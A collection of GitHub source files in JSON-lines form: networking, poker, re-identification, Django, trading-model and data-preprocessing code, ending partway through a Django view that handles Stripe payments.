EOT {} {}\".format(packetLength, ackNum))\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n exit()\n elif protocol == 1:\n if packetType == 1:\n if ackNum == firstInWindow:\n lock.acquire()\n for i in range(firstInWindow, lastInWindow + 1):\n sendBuffer[i % windowSize] = None\n timeouts[i % windowSize] = 0\n firstInWindow+=1\n firstInWindow%=256\n lastInWindow+=1\n lastInWindow%=256\n if sendBuffer[(i + 1)% windowSize] != None:\n break\n lock.release()\n elif ackNum >= firstInWindow and ackNum <= lastInWindow:\n sendBuffer[ackNum % windowSize] = None\n timeouts[ackNum % windowSize] = 0\n elif packetType == 2:\n print (\"PKT RECV EOT {} {}\".format(packetLength, ackNum))\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n eotAckReceived = True\n exit()\n\ndef main():\n global sendBaseSeqNum\n global protocol\n global senderSocket\n global channelIP\n global channelPort\n global timeout\n global firstInWindow\n global lastInWindow\n global eotAckReceived\n # Receiver \n protocol = int(sys.argv[1])\n timeout = int(sys.argv[2]) # timeout in milliseconds\n filename = sys.argv[3]\n senderIP = \"127.0.0.1\"\n windowSize = 10\n\n senderSocket = socket(AF_INET, SOCK_DGRAM)\n senderSocket.bind((senderIP, 0))\n\n if protocol == 1:\n for i in range(windowSize):\n sendBuffer.append(None)\n timeouts.append(0)\n\n data = []\n # read channelInfo\n with open('channelInfo', 'rb') as f:\n channelInfo = f.read()\n channelIP, channelPort = channelInfo.split()\n\n print (channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")))\n # read input data\n with open(filename, 'rb') as f:\n while 1:\n datachunk = f.read(500)\n if not datachunk:\n break\n data.append(datachunk)\n\n # Start thread looking for acknowledgements\n threadForAck = threading.Thread(name=\"ACKsThread\", target=getACKs, args=(senderSocket, 0))\n threadForAck.daemon = True\n threadForAck.start()\n\n signal.signal(signal.SIGALRM, timeoutHandler)\n signal.setitimer(signal.ITIMER_REAL, 0.001, timeout*0.001)\n\n seqNum = 0\n while data != []:\n if protocol == 0:\n if len(sendBuffer) < windowSize:\n datachunk = data.pop(0)\n packet = pack('!III'+ str(len(datachunk)) +'s', 0,len(datachunk)+12,seqNum,datachunk)\n print (\"PKT SEND DAT \" + str(12 + len(datachunk)) + \" {} \".format(seqNum))\n senderSocket.sendto(packet,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n sendBuffer.append((len(datachunk),seqNum,packet))\n timeouts.append(timeout)\n seqNum += 1\n seqNum %= 256\n elif protocol == 1:\n if seqNum <= lastInWindow:\n datachunk = data.pop(0)\n packet = pack('!III'+ str(len(datachunk)) +'s', 0,len(datachunk)+12,seqNum,datachunk)\n print (\"PKT SEND DAT \" + str(12 + len(datachunk)) + \" {} \".format(seqNum))\n senderSocket.sendto(packet,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n sendBuffer[seqNum % windowSize] = (len(datachunk),seqNum,packet)\n timeouts[seqNum % windowSize] = timeout\n seqNum += 1\n seqNum %= 256\n\n if protocol == 0:\n while sendBuffer != []:\n pass\n elif protocol == 1:\n while True:\n if all(value is None for value in sendBuffer):\n break\n\n eotPacket = pack('!III', 2, 12, 0)\n print (\"PKT SEND EOT 12 0\")\n senderSocket.sendto(eotPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n\n while not eotAckReceived:\n pass\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"aaron-lau/networks","sub_path":"a2/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26241393945","text":"#ACTIONS\nBET = 0#\"BET\"\nCALL = 1#\"CALL\"\nCHECK = 2#\"CHECK\"\nRAISE = 3#\"RAISE\"\nFOLD = 4#\"FOLD\"\nDEAL = 5#\"DEAL\"\nPOST = 6#\"POST\"\nREFUND = 7#\"REFUND\"\nSHOW = 8#\"SHOW\"\nTIE = 9#\"TIE\"\nWIN = 10#\"WIN\"\n\nACTION_TYPES = [\"BET\", \"CALL\", \"CHECK\", \"RAISE\", \"FOLD\", \"DEAL\", \"POST\",\n \"REFUND\", \"SHOWS\", \"TIE\", \"WIN\"]\n\n#STREETS\nPREFLOP = 0\nFLOP = 1\nTURN = 2\nRIVER = 3\n\nSTREET_TYPES = [\"PREFLOP\",\"FLOP\",\"TURN\",\"RIVER\"]\n\n#PACKET TYPES\nNEWGAME = \"NEWGAME\"\nNEWHAND = \"NEWHAND\"\nGETACTION = \"GETACTION\"\nHANDOVER = \"HANDOVER\"\n\n#ACTION AMOUNT TYPES\nPOTAMOUNT = \"POT AMOUNT\"\nBETAMOUNT = \"BET AMOUNT\"\nABSAMOUNT = \"ABS AMOUNT\"\n\n#PLAYER INDICES\nME = 0\nLEFTOPP = 1\nRIGHTOPP = 2\n\nITERATIONS = 10000\n\n#EV COMPARISONS\nAWFUL = 0\nBAD = 1\nOK = 2\nGOOD = 3\nUNKNOWN = -1\n\n#BET/RAISE BINS\nBIN1 = 0\nBIN2 = 1\nBIN3 = 2\nBIN4 = 3\n","repo_name":"oliversong/pokerbots","sub_path":"StephenBot/Enums.py","file_name":"Enums.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"24178327944","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @time:2019/6/12上午11:09\n# @Author: Yu Ci\n__all__ = ['visualize_ranked_results', 'visualize_in_pic']\n\nimport torch\nimport numpy as np\nimport os\nimport os.path as osp\nimport shutil\n# import matplotlib.pyplot as plt\n\nfrom utils.osutils import mkdir_if_missing\n\n\ndef visualize_ranked_results(distmat, queryloader, galleryloader, save_dir='', visual_id=2, topk=10):\n \"\"\"Visualizes ranked results. 存放在一个文件夹中\n\n Supports both image-reid and video-reid.\n\n Args:\n distmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\n queryloader (tuple): tuples of (img_path(s), pid, camid).\n galleryloader (tuple): tuples of (img_path(s), pid, camid).\n save_dir (str): directory to save output images.\n visual_id(int, optional): only show 1 id\n topk (int, optional): denoting top-k images in the rank list to be visualized.\n \"\"\"\n num_q, num_g = distmat.shape\n\n print('Visualizing top-{} ranks'.format(topk))\n print('# query: {}\\n# gallery {}'.format(num_q, num_g))\n print('Saving images to \"{}\"'.format(save_dir))\n\n query = queryloader # 1980个tuple (img_path(s), pid, camid))\n gallery = galleryloader # 9330个tuple (img_path(s), pid, camid)\n assert num_q == len(query)\n assert num_g == len(gallery)\n\n indices = np.argsort(distmat, axis=1) # : (1980, 9330)\n mkdir_if_missing(save_dir) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual'\n\n def _cp_img_to(src, dst, rank, prefix):\n \"\"\"\n Args:\n src: image path or tuple (for vidreid)\n dst: target directory # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg'\n rank: int, denoting ranked position, starting from 1\n prefix: string (query or gallery)\n \"\"\"\n if isinstance(src, tuple) or isinstance(src, list): # video reid\n dst = osp.join(dst, prefix + '_top' + str(rank).zfill(3)) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg/query_top000'\n mkdir_if_missing(dst)\n for img_path in src: # 将图片copy到目标文件夹中\n shutil.copy(img_path, dst)\n else:\n dst = osp.join(dst, prefix + '_top' + str(rank).zfill(3) + '_name_' + osp.basename(src))\n shutil.copy(src, dst)\n\n for q_idx in range(num_q): # 考虑到速度等因素,只输出1个id的rank结果。这个id不是实际的行人id,是在tuple中的顺序\n if q_idx == visual_id: # 14\n qimg_path, qpid, qcamid = query[q_idx] # qpid = 16, camid = 0\n\n if isinstance(qimg_path, tuple) or isinstance(qimg_path, list): # query_dir 保存Rank结果的文件夹名称 = query的第一张图片名称\n qdir = osp.join(save_dir, osp.basename(qimg_path[0])) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg'\n else:\n qdir = osp.join(save_dir, osp.basename(qimg_path))\n mkdir_if_missing(qdir) # 新建这个保存rank结果的文件夹\n _cp_img_to(qimg_path, qdir, rank=0, prefix='query') # 复制query的图片到结果文件夹中\n\n rank_idx = 1\n for g_idx in indices[q_idx, :]: # 3291, 3288, 3289, 3290, 3293\n gimg_path, gpid, gcamid = gallery[g_idx]\n invalid = (qpid == gpid) & (qcamid == gcamid) # true, 排除相同cam的情况\n if not invalid:\n _cp_img_to(gimg_path, qdir, rank=rank_idx, prefix='gallery')\n rank_idx += 1\n if rank_idx > topk:\n break\n print(\"Done\")\n\n\ndef visualize_in_pic(distmat, queryloader, galleryloader, save_dir='', visual_id=2, topk=9):\n \"\"\"\n\n distmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\n queryloader (tuple): tuples of (img_path(s), pid, camid).\n galleryloader (tuple): tuples of (img_path(s), pid, camid).\n save_dir (str): directory to save output images.\n visual_id(int, optional): only show 1 id\n topk (int, optional): denoting top-k images in the rank list to be visualized.\n \"\"\"\n num_q, num_g = distmat.shape\n\n print('Visualizing top-{} ranks'.format(topk+1))\n print('# query: {}\\n# gallery {}'.format(num_q, num_g))\n print('Saving images to \"{}\"'.format(save_dir))\n\n query = queryloader # 1980个tuple (img_path(s), pid, camid))\n gallery = galleryloader # 9330个tuple (img_path(s), pid, camid)\n assert num_q == len(query)\n assert num_g == len(gallery)\n\n indices = np.argsort(distmat, axis=1) # : (1980, 9330)\n mkdir_if_missing(save_dir) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual'\n\n def imshow(path, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n im = plt.imread(path)\n plt.imshow(im)\n if title is not None:\n plt.title(title)\n # plt.pause(0.001) # pause a bit so that plots are updated\n flag = 0\n for q_idx in range(num_q): # 考虑到速度等因素,只输出1个id的rank结果。2,4,6,8,10..\n qimg_path, qpid, qcamid = query[q_idx] # qpid = 16, camid = 0\n\n if qpid == visual_id: # 14\n flag = 1\n fig = plt.figure(figsize=(25, 8))\n ax = plt.subplot(1, 11, 1)\n ax.axis('off')\n imshow(qimg_path[0], 'query, pid:{}'.format(qpid))\n\n rank_idx = 0\n for g_idx in indices[q_idx, :]: # 3291, 3288, 3289, 3290, 3293\n gimg_path, gpid, gcamid = gallery[g_idx]\n # invalid = (qpid == gpid) & (qcamid == gcamid) # true, 排除相同cam的情况\n invalid = False\n if not invalid:\n rank_idx += 1\n ax = plt.subplot(1, 11, rank_idx+1)\n ax.axis('off')\n imshow(gimg_path[0])\n if qpid == gpid:\n ax.set_title('rank:{},pid{}_{}'.format(rank_idx, gpid, gcamid), color='green')\n else:\n ax.set_title('rank:{},pid{}_{}'.format(rank_idx, gpid, gcamid), color='red')\n\n if rank_idx > topk:\n break\n fig.savefig(\"show_{}_{}.png\".format(qpid, qcamid))\n break\n if flag == 1:\n print(\"Done\")\n else:\n print(\"No matched person in query_dataset, try another id\")\n","repo_name":"flysnowtiger/GRL","sub_path":"reid/evaluator/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"} +{"seq_id":"26981722394","text":"# -*- encoding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import Context, RequestContext\n\nfrom project.chercheurs.api import API\nfrom project.chercheurs.forms import ChercheurSearchForm\n\ndef liste_chercheurs(request): \n \"\"\" Liste des chercheurs \"\"\"\n search_form = ChercheurSearchForm(request.GET)\n search_form.save(commit=False)\n \n api = API(request) \n if not request.GET or request.GET.get('page') or request.GET.get('tri'):\n chercheurs = api.chercheurs_liste()\n else:\n chercheurs = api.chercheurs_recherche()\n\n if chercheurs is None:\n return render_to_response(\"chercheurs/erreur_sep_indisponible.html\", {}, RequestContext(request))\n \n sort = request.GET.get('tri')\n \n if sort is not None and sort.endswith('_desc'):\n sort = sort[:-5]\n sens = True\n else:\n sens = False\n \n \n if sort == 'nom':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.nom, reverse=sens)\n elif sort == 'etablissement':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.etablissement, reverse=sens)\n elif sort == 'pays':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.pays, reverse=sens)\n \n nb_chercheurs = len(chercheurs)\n\n c = {\n 'chercheurs': chercheurs,\n 'nb_chercheurs': nb_chercheurs,\n 'search_form': search_form,\n }\n return render_to_response(\"chercheurs/liste_chercheurs.html\", Context(c), context_instance = RequestContext(request))\n\ndef chercheur(request, chercheur_id):\n \"\"\" Détails d'un chercheur \"\"\"\n api = API(request)\n chercheur = api.chercheur(chercheur_id)\n \n if not chercheur:\n return render_to_response(\"chercheurs/erreur_sep_indisponible.html\", {}, RequestContext(request))\n\n c = {\n 'chercheur': chercheur\n }\n return render_to_response(\"chercheurs/fiche.html\", Context(c), context_instance = RequestContext(request))\n\n","repo_name":"Abouplah/nefpy","sub_path":"project/chercheurs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7538528729","text":"'''\nprovide various functions to load data.\n'''\n\n# built-in\nimport os\nimport json\nimport pickle\n\n# external\nimport yaml\n\n# customs\n\n\ndef load_config(path):\n '''\n Load configs.\n This function can load different types of formats.\n The file format is determined by its extension.\n\n Args:\n path: path to the config file\n can be a single config file (str)\n or a list of config files (list[str]).\n If a list is specified, the first one is considered\n as a \"main\" config, and the other ones will overwrite the content\n of the main config.\n\n Returns:\n config (whatever dumped in a file)\n '''\n if isinstance(path, str): return load_config([path])\n assert isinstance(path, (tuple, list))\n assert path\n\n configs = list(map(_load_config_single, path))\n config = configs[0]\n for additional_conf in configs[1:]:\n config = _apply_config(config, additional_conf)\n return config\n\n\ndef _apply_config(base_config, add_config):\n '''update the content of base_config with add_config'''\n def _apply(target, dest, value):\n if '.' not in dest:\n target[dest] = value\n else:\n keys = dest.split('.')\n if keys[0] not in target: target[keys[0]] = dict()\n _apply(target[keys[0]], '.'.join(keys[1:]), value)\n return target\n\n for key, val in add_config.items():\n base_config = _apply(base_config, key, val)\n return base_config\n\n\ndef _load_config_single(path):\n '''\n Load configs.\n This function can load different types of formats.\n The file format is determined by its extension.\n\n Args:\n path: path to the config file\n\n Returns:\n config (whatever dumped in a file)\n '''\n extension = os.path.splitext(path)[1][1:]\n\n if extension == 'json':\n with open(path) as f:\n config = json.load(f)\n elif extension == 'yaml':\n with open(path) as f:\n config = yaml.safe_load(f)\n elif extension == 'pickle':\n with open(path, 'rb') as f:\n config = pickle.load(f)\n else: raise NotImplementedError(f'Unexpected extension {extension}')\n return config\n","repo_name":"yoshihikoueno/DNNCancerAnnotator","sub_path":"annotator/utils/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11839634382","text":"\"\"\"\n File name: movingAverage.py\n Author: Timothy Clark\n Date created: 6/26/2021\n Date last modified: 05/29/2022\n Python Version: 3.9\n\n Description: Runs a Simple Moving Average (SMA) algorithim on the stock ticker provided.\n The short term and long terma rolling means can be adjusted to create a Dual Moving\n Average (DMA) model\n\"\"\"\n\nimport alpaca_trade_api as tradeapi\nfrom alpaca_trade_api.rest import TimeFrame\nimport constants\nimport datetime\nimport numpy as np\nimport pandas as pd\n# import matplotlib.pyplot as plt\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\napi = tradeapi.REST(\n constants.API_KEY,\n constants.API_SECRET_KEY,\n constants.MARKET\n)\n\ndate = datetime.datetime.now()\nstart = (date - datetime.timedelta(days=300)).strftime(\"%Y-%m-%d\")\n\ndef maModel(ticker):\n # get daily stock data for the ticker provided\n tickerdata = api.get_bars(ticker, TimeFrame.Day,start=start).df\n day = np.arange(1, len(tickerdata) + 1)\n tickerdata['day']= day\n\n # Calculate rolling averages per day\n tickerdata['short-term'] = tickerdata['close'].rolling(5).mean()\n tickerdata['long-term'] = tickerdata['close'].rolling(25).mean()\n\n # add a signal for buy or sell\n tickerdata['signal'] = np.where(tickerdata['short-term'] > tickerdata['long-term'], 1, 0)\n tickerdata['signal'] = np.where(tickerdata['short-term'] < tickerdata['long-term'], -1, tickerdata['signal'])\n tickerdata.dropna(inplace=True)\n\n # create a flag for when to create buy or sell transaction\n tickerdata['return'] = np.log(tickerdata['close']).diff()\n tickerdata['system_return'] = tickerdata['signal'] * tickerdata['return']\n tickerdata['transactionFlag'] = tickerdata.signal.diff()\n \n return tickerdata.loc[tickerdata.index[-1],'transactionFlag']\n\ndef maChannelModel(ticker):\n # get daily stock data for the ticker provided\n tickerdata = api.get_bars(ticker, TimeFrame.Day, limit=300).df\n day = np.arange(1, len(tickerdata) + 1)\n tickerdata['day']= day\n\n # Calculate rolling averages per day\n tickerdata['short-term'] = tickerdata['high'].rolling(10).mean()\n tickerdata['long-term'] = tickerdata['low'].rolling(10).mean()\n tickerdata['prev-close'] = tickerdata['close'].shift()\n tickerdata['prev-short'] = tickerdata['short-term'].shift()\n tickerdata['prev-long'] = tickerdata['long-term'].shift()\n \n # add a signal for buy or sell\n tickerdata['signal'] = np.where(((tickerdata['close'] > tickerdata['short-term']) & (tickerdata['prev-close'] > tickerdata['prev-short'])), 1, 0)\n tickerdata['signal'] = np.where(((tickerdata['close'] < tickerdata['long-term']) & (tickerdata['prev-close'] < tickerdata['prev-long'])), -1, tickerdata['signal'])\n tickerdata.dropna(inplace=True)\n\n # create a flag for when to create buy or sell transaction\n tickerdata['return'] = np.log(tickerdata['close']).diff()\n tickerdata['system_return'] = tickerdata['signal'] * tickerdata['return']\n tickerdata['transactionFlag'] = tickerdata.signal.diff()\n \n print(tickerdata['return'])\n # maPlot(tickerdata)\n \n return tickerdata.loc[tickerdata.index[-1],'transactionFlag']\n\n\n###################################################\n# Functions maPlot and maPerformance #\n# are strictly for testing and research purposes #\n###################################################\n\n# def maPlot(gld):\n# plt.rcParams['figure.figsize'] = 12, 6\n# plt.grid(True, alpha = .3)\n# plt.plot(gld.iloc[-208:]['close'], label = 'GLD')\n# plt.plot(gld.iloc[-208:]['short-term'], label = 'short-term')\n# plt.plot(gld.iloc[-208:]['long-term'], label = 'long-term')\n# plt.plot(gld[-208:].loc[gld.transactionFlag == 2].index, gld[-208:]['short-term'][gld.transactionFlag == 2], '^',\n# color = 'g', markersize = 12)\n# plt.plot(gld[-208:].loc[gld.transactionFlag == -2].index, gld[-208:]['long-term'][gld.transactionFlag == -2], 'v',\n# color = 'r', markersize = 12)\n# plt.legend(loc=2)\n# plt.show()\n\n# def maPerformance(gld):\n# plt.plot(np.exp(gld['return']).cumprod(), label='Buy/Hold')\n# plt.plot(np.exp(gld['system_return']).cumprod(), label='System')\n# plt.legend(loc=2)\n# plt.grid(True, alpha=.3)\n# plt.show()\n \n\n\n","repo_name":"tgclark20/Alpine","sub_path":"alpine/movingAverage.py","file_name":"movingAverage.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5399674763","text":"from django.shortcuts import render_to_response\r\nfrom mango_demo.api.resources import UserResource\r\n\r\ndef user_detail(request, username):\r\n ur = UserResource()\r\n user = ur.obj_get(username=username)\r\n \r\n ur_bundle = ur.build_bundle(obj=user, request=request)\r\n return render_to_response('mango_demo/user_detail.html', {\r\n # Other things here.\r\n \"user_json\": ur.serialize(None, ur.full_dehydrate(ur_bundle), 'application/json'),\r\n })\r\n\r\n","repo_name":"matthewting/amazing","sub_path":"mango_demo/mango_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7445355100","text":"import os\nimport sys\nsys.path.insert(0, '../../../../scripts/')\nimport preprocessing as pp\nimport pandas as pd\nimport unidecode as ud\n\nflag = 0\n\nout = []\nresult = []\nmain_df = pd.DataFrame(columns = ['id', 'sent_1', 'sent_2', 'label', 'stance'])\nout_main_df = pd.DataFrame(columns = ['content']) \nfor filename in os.listdir(os.getcwd()):\n #print filename\n if \"onew_result_1\" in filename:\n #print filename\n df_1 = pd.read_csv(filename, names= None)\n main_df = main_df.append(df_1)\n if \"onew_result_2\" in filename:\n df_2 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_2)\n if \"onew_result_3\" in filename:\n df_3 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_3)\n if \"onew_result_4\" in filename:\n df_4 = pd.read_csv(filename, names=None)\n main_df = main_df.append(df_4)\n elif \"onew_out\" in filename:\n out_df = pd.read_csv(filename, names = None)\n out_main_df = out_main_df.append(out_df)\n\n\nset_df = pd.DataFrame(columns = ['id', 'sent_1', 'sent_2', 'label', 'stance'])\nset_df = set_df.append(df_1)\nset_df = set_df.append(df_2)\nset_df = set_df.append(df_3)\n\ntr_set1_df_4 = df_4.iloc[:-2368]\ntst_set1_df_4 = df_4.iloc[-2368:]\n\ntr_set2_df_4 = df_4.iloc[ :-4732].append(df_4.iloc[-2368:])\ntst_set2_df_4 = df_4.iloc[-4732:-2368]\n\ntr_set3_df_4 = df_4.iloc[ :-7096].append(df_4.iloc[-4732:])\ntst_set3_df_4 = df_4.iloc[-7096:-4732]\n\ntr_set4_df_4 = df_4.iloc[ :-9460].append(df_4.iloc[-7096:])\ntst_set4_df_4 = df_4.iloc[-9460:-7096]\n\ntr_set5_df_4 = df_4.iloc[:2368].append(df_4.iloc[4732:])\ntst_set5_df_4 = df_4.iloc[2368:4732]\n\n\n#print main_df\n#print len(main_df)\n#print len(out_main_df)\n\n'''\nmain_df = main_df.sample(frac=1).reset_index(drop=True)\ndf_class0 = main_df.loc[main_df['label'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = main_df.loc[main_df['label'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\nsize = len(df_class1)\ndf_class0 = df_class0.iloc[:size+1000]\ntr_df_123 = df_class1.append(df_class0)\ntr_df_123 = tr_df_123.sample(frac=1).reset_index(drop=True)\n\nprint len(tr_df_123)\ntr_df_123.to_csv('tr-combined-412.csv', index=False)\n\n\nprint len(main_df)\nprint len(out_main_df)\n\nmain_df = main_df.sample(frac=1).reset_index(drop=True)\nmain_df.to_csv('new-combined-result.csv', index=False)\nout_main_df.to_csv('new-combined-out.csv', index=False)\n\n'''\nprint(len(set_df))\ntr_set1_df_4 = tr_set1_df_4.append(set_df)\ntr_set1_df_4 = tr_set1_df_4.sample(frac=1).reset_index(drop=True)\ndf_class0 = tr_set1_df_4.loc[tr_set1_df_4['label'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = tr_set1_df_4.loc[tr_set1_df_4['label'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\nsize = len(df_class1)\ndf_class0 = df_class0.iloc[:size+1000]\ntr_df_4 = df_class1.append(df_class0)\ntr_df_4 = tr_df_4.sample(frac=1).reset_index(drop=True)\n\nprint(len(tr_df_4))\nprint(len(tst_set1_df_4))\n\ntr_df_4.to_csv('tr_set1_df_4.csv', index=False)\ntst_set1_df_4.to_csv('tst_set1_df_4.csv', index=False)\n\n\n'''\ntrain_df = main_df.iloc[:-1000]\nremain_df = main_df.iloc[-1000:]\nremain_df = remain_df.sample(frac=1).reset_index(drop=True)\n\ndev_df = remain_df.iloc[:-500]\ntest_df = remain_df.iloc[-500:]\n\n\n#train_df.to_csv('train.csv', index=False)\n#dev_df.to_csv('dev.csv', index=False)\n#test_df.to_csv('test.csv', index=False)\n\ndf_class0 = main_df.loc[main_df['labels'] == 0]\ndf_class0 = df_class0.sample(frac=1).reset_index(drop=True)\ndf_class1 = main_df.loc[main_df['labels'] == 1]\ndf_class1 = df_class1.sample(frac=1).reset_index(drop=True)\n\ntrain_df_class0 = df_class0.iloc[:-500]\n\n#making class 0 size almost equal to class 1 size in training data\ntrain_df_class0 = train_df_class0.iloc[:4000]\n\nremain_df_class0 = df_class0.iloc[-500:]\ndev_df_class0 = remain_df_class0[:-250]\ntest_df_class0 = remain_df_class0[-250:]\n\ntrain_df_class1 = df_class1.iloc[:-500]\nremain_df_class1 = df_class1.iloc[-500:]\ndev_df_class1 = remain_df_class1[:-250]\ntest_df_class1 = remain_df_class1[-250:]\n\ntrain_df = train_df_class0.append(train_df_class1)\ntrain_df.sample(frac=1).reset_index(drop=True)\ndev_df = dev_df_class0.append(dev_df_class1)\ndev_df.sample(frac=1).reset_index(drop=True)\ntest_df = test_df_class0.append(test_df_class1)\ntest_df.sample(frac=1).reset_index(drop=True)\n\nprint len(train_df)\nprint len(dev_df)\nprint len(test_df)\n\ntrain_df.to_csv('train_balanced.csv', index=False)\ndev_df.to_csv('dev_balanced.csv', index=False)\ntest_df.to_csv('test_balanced.csv', index=False)\n'''\n\n'''\ntext = out_main_df['content'].tolist()\ntext = \" \".join(text)\ntext = text.decode('ascii', 'ignore')\nans = pp.preprocess_pipeline(text, lang='english', stemmer_type ='WordNetLemmatizer', return_as_list=True, do_remove_stopwords=True)\nlist_df = pd.DataFrame(columns = ['word'])\nlist_df['word'] = ans\n\n'''\n#list_df.to_csv('combined-word-list.csv', index=False)\n\n#print len(ans)\n#print ans \n","repo_name":"ayush-jain/paraphrase-stance-cf","sub_path":"scripts/combine_output.py","file_name":"combine_output.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7907610270","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom base.serializer import *\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.contrib.auth.models import User\nfrom base.models import UserStripe, UserPaymentMethodsStripe, ShippingAdress\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import status\nimport stripe\nimport json\n\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n def validate(self, attrs):\n data = super().validate(attrs)\n\n serializer = UserSerializerWithtoken(self.user).data\n print(serializer)\n\n for k, v in serializer.items():\n data[k] = v\n\n return data\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUsers(request):\n users = User.objects.all()\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef registerUser(request):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n data= request.data\n\n try:\n user = User.objects.create(\n first_name = data['name'],\n username = data['email'],\n email = data['email'],\n password = make_password(data['password']),\n )\n print(data)\n customer=stripe.Customer.create(\n name=data['name'],\n email =data['email'],\n )\n user_stripe_id = UserStripe.objects.create(\n user=user,\n stripe_customer_id= customer.id\n )\n\n serializer = UserSerializerWithtoken(user, many= False)\n return Response(serializer.data)\n\n except:\n message = {'detail': 'User already exists'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUserById(request, pk):\n user = User.objects.get(id=pk)\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef deleteUser(request, pk):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n userForDeletion = User.objects.get(id=pk)\n usersStripe = UserStripe.objects.get(user= userForDeletion)\n stripe_customer=stripe.Customer.delete(usersStripe.stripe_customer_id)\n usersStripe.delete()\n userForDeletion.delete()\n return Response('user deleted')\n\n@api_view(['PUT'])\n@permission_classes([IsAdminUser])\ndef updateUser(request, pk):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n user = User.objects.get(id=pk)\n\n data = request.data\n\n user.first_name = data['name']\n user.last_name = data['email']\n user.email = data['email']\n user.is_staff = data['isAdmin']\n\n user_stripe_id = UserStripe.objects.get(user=user)\n customer=stripe.Customer.modify(\n user_stripe_id.stripe_customer_id,\n name=data['name'],\n email =data['email'],\n )\n\n user.save()\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef addCouponToUser(request, pk):\n error_message = 'coupon does not exists'\n try:\n data = request.data\n coupon = data['coupon']\n coupon = Coupon.objects.get(code = coupon.upper())\n user = User.objects.get(id=pk)\n if request.user == user:\n user.coupon_set.add(coupon)\n\n user.save()\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n else:\n raise Exception('User is not the current request user')\n except Exception as e:\n error_message = e\n message = {'detail': f'{error_message}'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef addPaymentMethod(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n stripe.api_key = settings.STRIPE_SECRET_KEY\n stripe_payment_id=stripe.PaymentMethod.create(\n type=\"card\",\n card={\n \"number\": data['card-number'],\n \"exp_month\": data['card-exp-month'],\n \"exp_year\": data['card-exp-year'],\n \"cvc\": data['card-cvc'],\n },\n )\n stripe_customer = user.userstripe\n print(stripe_customer)\n\n 